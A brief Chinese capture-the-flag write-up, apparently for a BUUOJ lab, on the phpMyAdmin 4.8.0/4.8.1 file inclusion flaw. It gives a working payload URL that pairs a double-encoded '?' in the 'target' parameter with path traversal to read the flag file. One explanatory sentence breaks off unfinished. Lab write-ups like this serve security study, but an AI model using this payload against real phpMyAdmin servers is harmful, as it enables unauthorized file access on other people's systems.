存在phpinfo.php文件
目录扫描出目录下有phpmyadmin管理页面并且不需要密码就可以登录
此处考察了phpmyadmin 4.8.1 远程文件包含漏洞
影响版本
phpMyAdmin 4.8.0和4.8.1
漏洞成成因:是因为在以上两个版本中的target变量限制不完全所导致的的,存在命令执行漏洞,因为
构造payload:
http://acd954ec-2c08-4199-94e1-14f1d9e8a452.node5.buuoj.cn/phpmyadmin/index.php?target=db_export.php%253f/../../../../../../../../flag
就可以直接查看flag